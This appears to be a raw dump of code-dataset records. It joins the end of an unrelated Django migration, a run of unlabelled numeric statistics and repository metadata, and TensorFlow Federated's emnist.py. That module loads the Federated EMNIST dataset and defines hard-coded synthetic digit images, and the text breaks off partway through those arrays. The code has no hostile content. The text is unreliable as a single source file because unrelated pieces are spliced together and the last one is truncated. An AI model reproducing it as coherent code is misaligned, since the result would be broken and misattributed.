migrations.AlterField(
model_name='product',
name='weft_yarn_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='weft_yarn_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='weight_unit',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='weight_value',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='product',
name='yarns_type',
field=models.CharField(blank=True, max_length=50),
),
]
| 36.262009
| 114
| 0.564186
| 791
| 8,304
| 5.744627
| 0.131479
| 0.089129
| 0.158451
| 0.190141
| 0.885123
| 0.871259
| 0.852553
| 0.809639
| 0.764305
| 0.764305
| 0
| 0.022023
| 0.316474
| 8,304
| 228
| 115
| 36.421053
| 0.778541
| 0.005419
| 0
| 0.734234
| 1
| 0
| 0.115417
| 0.020589
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009009
| 0
| 0.022523
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
15dad19d072862c2bc73fdf6995425b9976142b2
| 23,967
|
py
|
Python
|
tensorflow_federated/python/simulation/datasets/emnist.py
|
alessiomora/federated
|
3b501067ed7062aaec3cc8830aaec0a7cf8f0942
|
[
"Apache-2.0"
] | 1,918
|
2019-02-22T21:17:28.000Z
|
2022-03-30T14:49:53.000Z
|
tensorflow_federated/python/simulation/datasets/emnist.py
|
alessiomora/federated
|
3b501067ed7062aaec3cc8830aaec0a7cf8f0942
|
[
"Apache-2.0"
] | 999
|
2019-02-22T21:47:44.000Z
|
2022-03-31T11:06:42.000Z
|
tensorflow_federated/python/simulation/datasets/emnist.py
|
alessiomora/federated
|
3b501067ed7062aaec3cc8830aaec0a7cf8f0942
|
[
"Apache-2.0"
] | 498
|
2019-02-22T21:17:56.000Z
|
2022-03-29T02:54:15.000Z
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Libraries for the federated EMNIST dataset for simulation."""
import collections
import tensorflow as tf
from tensorflow_federated.python.simulation.datasets import download
from tensorflow_federated.python.simulation.datasets import from_tensor_slices_client_data
from tensorflow_federated.python.simulation.datasets import sql_client_data
def _add_proto_parsing(dataset: tf.data.Dataset) -> tf.data.Dataset:
"""Add parsing of the tf.Example proto to the dataset pipeline."""
def parse_proto(tensor_proto):
parse_spec = {
'pixels': tf.io.FixedLenFeature(shape=(28, 28), dtype=tf.float32),
'label': tf.io.FixedLenFeature(shape=(), dtype=tf.int64)
}
parsed_features = tf.io.parse_example(tensor_proto, parse_spec)
return collections.OrderedDict(
label=tf.cast(parsed_features['label'], tf.int32),
pixels=parsed_features['pixels'])
return dataset.map(parse_proto, num_parallel_calls=tf.data.AUTOTUNE)
def load_data(only_digits=True, cache_dir=None):
"""Loads the Federated EMNIST dataset.
Downloads and caches the dataset locally. If previously downloaded, tries to
load the dataset from cache.
This dataset is derived from the Leaf repository
(https://github.com/TalwalkarLab/leaf) pre-processing of the Extended MNIST
dataset, grouping examples by writer. Details about Leaf were published in
"LEAF: A Benchmark for Federated Settings" https://arxiv.org/abs/1812.01097.
*Note*: This dataset does not include some additional preprocessing that
MNIST includes, such as size-normalization and centering.
In the Federated EMNIST data, the value of 1.0
corresponds to the background, and 0.0 corresponds to the color of the digits
themselves; this is the *inverse* of some MNIST representations,
e.g. in [tensorflow_datasets]
(https://github.com/tensorflow/datasets/blob/master/docs/datasets.md#mnist),
where 0 corresponds to the background color, and 255 represents the color of
the digit.
Data set sizes:
*only_digits=True*: 3,383 users, 10 label classes
- train: 341,873 examples
- test: 40,832 examples
*only_digits=False*: 3,400 users, 62 label classes
- train: 671,585 examples
- test: 77,483 examples
Rather than holding out specific users, each user's examples are split across
_train_ and _test_ so that all users have at least one example in _train_ and
one example in _test_. Writers that had less than 2 examples are excluded from
the data set.
The `tf.data.Datasets` returned by
`tff.simulation.datasets.ClientData.create_tf_dataset_for_client` will yield
`collections.OrderedDict` objects at each iteration, with the following keys
and values, in lexicographic order by key:
- `'label'`: a `tf.Tensor` with `dtype=tf.int32` and shape [1], the class
label of the corresponding pixels. Labels [0-9] correspond to the digits
classes, labels [10-35] correspond to the uppercase classes (e.g., label
11 is 'B'), and labels [36-61] correspond to the lowercase classes
(e.g., label 37 is 'b').
- `'pixels'`: a `tf.Tensor` with `dtype=tf.float32` and shape [28, 28],
containing the pixels of the handwritten digit, with values in
the range [0.0, 1.0].
Args:
only_digits: (Optional) whether to only include examples that are from the
digits [0-9] classes. If `False`, includes lower and upper case
characters, for a total of 62 class labels.
cache_dir: (Optional) directory to cache the downloaded file. If `None`,
caches in Keras' default cache directory.
Returns:
Tuple of (train, test) where the tuple elements are
`tff.simulation.datasets.ClientData` objects.
"""
database_path = download.get_compressed_file(
origin='https://storage.googleapis.com/tff-datasets-public/emnist_all.sqlite.lzma',
cache_dir=cache_dir)
if only_digits:
train_client_data = sql_client_data.SqlClientData(
database_path, 'digits_only_train').preprocess(_add_proto_parsing)
test_client_data = sql_client_data.SqlClientData(
database_path, 'digits_only_test').preprocess(_add_proto_parsing)
else:
train_client_data = sql_client_data.SqlClientData(
database_path, 'all_train').preprocess(_add_proto_parsing)
test_client_data = sql_client_data.SqlClientData(
database_path, 'all_test').preprocess(_add_proto_parsing)
return train_client_data, test_client_data
def get_synthetic():
"""Returns a small synthetic dataset for testing.
The single client produced has exactly 10 examples, one example for each digit
label. The images are derived from a fixed set of hard-coded images.
Returns:
A `tff.simulation.datasets.ClientData` object that matches the
characteristics (other than size) of those provided by
`tff.simulation.datasets.emnist.load_data`.
"""
return from_tensor_slices_client_data.TestClientData(
{'synthetic': _get_synthetic_digits_data()})
def _get_synthetic_digits_data():
"""Returns a dictionary suitable for `tf.data.Dataset.from_tensor_slices`.
Returns:
A dictionary that matches the structure of the data produced by
`tff.simulation.datasets.emnist.load_data`, with keys (in lexicographic
order) `label` and `pixels`.
"""
data = _SYNTHETIC_DIGITS_DATA
img_list = []
for img_array in data:
img_array = tf.constant(img_array, dtype=tf.float32) / 9.0
img_list.append(img_array)
pixels = tf.stack(img_list, axis=0)
labels = tf.constant(range(10), dtype=tf.int32)
return collections.OrderedDict(label=labels, pixels=pixels)
# pyformat: disable
# pylint: disable=bad-continuation,bad-whitespace
_SYNTHETIC_DIGITS_DATA = [
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,2,4,4,4,7,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,7,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,7,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,0,0,2,4,7,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,4,4,2,0,0,0,2,4,7,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,2,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,2,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,7,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,4,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,2,4,4,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,2,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
[[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
